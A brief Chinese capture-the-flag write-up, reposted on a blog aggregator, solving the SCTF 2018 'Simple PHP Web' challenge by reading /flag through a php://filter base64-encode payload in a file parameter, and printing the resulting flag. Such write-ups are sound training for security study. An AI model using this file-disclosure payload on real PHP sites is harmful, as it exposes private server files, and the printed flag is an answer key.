bmzctf刷题 SCTF 2018_Simple PHP Web

时间:2021-06-18 19:12:05   收藏:0   阅读:0

bmzctf刷题 SCTF 2018_Simple PHP Web

技术图片

正常解法

一眼就可以看出/f=login.php
直接文件读取
技术图片
失败

尝试伪协议读取
payload
?f=php://filter/read=convert.base64-encode/resource=/flag
技术图片

base64解码后
BMZCTF{fb169f79d7e64512bb272aad5dab2b1a}
OVER

其他的尝试

看到这两个框框。。。

sql注入

好吧,不用试了
技术图片

<script> alert(/login error!/)</script>

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!